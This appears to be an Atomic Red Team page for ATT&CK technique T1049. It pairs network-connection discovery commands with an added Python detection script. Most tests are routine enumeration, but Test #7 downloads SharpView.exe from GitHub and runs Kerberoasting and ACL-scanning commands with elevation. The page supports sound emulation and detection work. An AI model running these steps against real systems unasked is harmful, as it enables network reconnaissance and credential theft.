T1049
System Network Connections Discovery
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net. In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and Network Device CLI may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) On ESXi servers, the command esxcli network ip connection list can be used to list active network connections.(Citation: Sygnia ESXi Ransomware 2025)
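Any one of these utilities is routine administration, so detection usually keys on several of them run close together by the same account. The following is an added example, not part of the Atomic Red Team project: it classifies process command lines and alerts on such a burst. The event tuple layout, the 300-second window and the three-tool threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict
# Command-line patterns for connection-listing utilities this page names.
TOOLS = {
    "netstat": r"netstat(\.exe)?\b",
    "net use": r"net1?(\.exe)?\s+use\b",
    "net session": r"net1?(\.exe)?\s+sessions?\b",
    "Get-NetTCPConnection": r"Get-NetTCPConnection\b",
    "ss": r"ss\s+-\w*[tu]\w*",
    "lsof": r"lsof\s+(-\w+\s+)*-\w*i",
    "sockstat": r"sockstat\b",
}
# A name must start the line or follow a separator, so "mynetstat" is not a hit.
COMPILED = {n: re.compile(r"(?:^|[\s;&|(/\\])" + p, re.I) for n, p in TOOLS.items()}

def classify(cmdline):
    """Return the set of connection-discovery utilities seen in one command line."""
    return {name for name, rx in COMPILED.items() if rx.search(cmdline)}

def correlate(events, window=300, min_tools=3):
    """Alert when one (host, user) runs >= min_tools distinct utilities within window seconds."""
    hits = defaultdict(list)
    for ts, host, user, cmd in events:
        for tool in classify(cmd):
            hits[(host, user)].append((ts, tool))
    alerts = []
    for (host, user), seq in sorted(hits.items()):
        seq.sort()
        i = 0
        while i < len(seq):
            in_win = [h for h in seq[i:] if h[0] - seq[i][0] <= window]
            tools = sorted({tool for _, tool in in_win})
            if len(tools) >= min_tools:
                alerts.append({"host": host, "user": user, "start": seq[i][0], "tools": tools})
                i += len(in_win)  # consume the burst so it is reported once
            else:
                i += 1
    return alerts

# Constructed sample events (assumed layout): (epoch seconds, host, user, command line).
SAMPLE = [
    (1000, "ws01", "alice", "cmd.exe /c netstat -ano"),
    (1004, "ws01", "alice", "net use"),
    (1009, "ws01", "alice", "net sessions 2>nul"),
    (1500, "ws02", "bob", "netstat -rn"),  # single utility: no alert
    (2000, "srv1", "www", "sh -c ss -antp"),
    (2003, "srv1", "www", "lsof -i -nP"),
    (2010, "srv1", "www", "sockstat -4"),
]
if __name__ == "__main__": print(*correlate(SAMPLE), sep="\n")
```

Tune the window and threshold against the baseline of legitimate administrative activity in the environment before alerting on the result.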
Atomic Tests
- Atomic Test #2 - System Network Connections Discovery with PowerShell
- Atomic Test #3 - System Network Connections Discovery via PowerShell (Process Mapping)
- Atomic Test #4 - System Network Connections Discovery via ss or lsof (Linux/MacOS)
- Atomic Test #5 - System Network Connections Discovery FreeBSD, Linux & MacOS
- Atomic Test #6 - System Network Connections Discovery via sockstat (Linux, FreeBSD)

Atomic Test #1 - System Network Connections Discovery
Get a listing of network connections.
Upon successful execution, cmd.exe will execute netstat, net use and net sessions. net sessions requires
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Supported Platforms: Windows
auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
Attack Commands: Run with command_prompt!

```cmd
netstat -ano
net use
net sessions 2>nul
```

Atomic Test #2 - System Network Connections Discovery with PowerShell
Get a listing of network connections.
Upon successful execution, powershell.exe will execute Get-NetTCPConnection. Results will output via stdout.
Supported Platforms: Windows
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
Attack Commands: Run with powershell!

```powershell
Get-NetTCPConnection
```

Atomic Test #3 - System Network Connections Discovery via PowerShell (Process Mapping)
Enumerate TCP connections and map to owning process names via PowerShell.
Supported Platforms: Windows
auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
Attack Commands: Run with powershell!

```powershell
Get-NetTCPConnection | ForEach-Object {
    $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Local   = "$($_.LocalAddress):$($_.LocalPort)"
        Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
        State   = $_.State
        PID     = $_.OwningProcess
        Process = if ($p) { $p.ProcessName } else { $null }
    }
} | Sort-Object State,Process | Format-Table -AutoSize
```

Atomic Test #4 - System Network Connections Discovery via ss or lsof (Linux/MacOS)
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Supported Platforms: Linux, macOS
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
Attack Commands: Run with bash!

```bash
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
```

Atomic Test #5 - System Network Connections Discovery FreeBSD, Linux & MacOS
Get a listing of network connections.
Upon successful execution, sh will execute netstat and who -a. Results will output via stdout.
Supported Platforms: Linux, macOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
Attack Commands: Run with sh!

```sh
netstat
who -a
```

Dependencies: Run with sh!
Description: Check if netstat command exists on the machine
Check Prereq Commands:

```sh
if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
```

Get Prereq Commands:

```sh
echo "Install netstat on the machine."; exit 1;
```

Atomic Test #6 - System Network Connections Discovery via sockstat (Linux, FreeBSD)
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Supported Platforms: Linux
auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
Attack Commands: Run with sh!

```sh
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
```

Atomic Test #7 - System Discovery using SharpView
Get a listing of network connections, domains, domain users, etc. using sharpview.exe, an open-source red-team tool located in the bin folder. Upon successful execution, cmd.exe will execute sharpview.exe. Results will output via stdout.
Supported Platforms: Windows
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true |
| SharpView | Path of the executable open-source red-team tool used to perform this atomic. | path | PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe |
| syntax | Argument methods used with SharpView to get a listing of network connections, domains, domain users, etc. | string | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare" |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```powershell
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
```

Dependencies: Run with powershell!
Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
Check Prereq Commands:

```powershell
if (Test-Path "#{SharpView}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{SharpView}") -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
```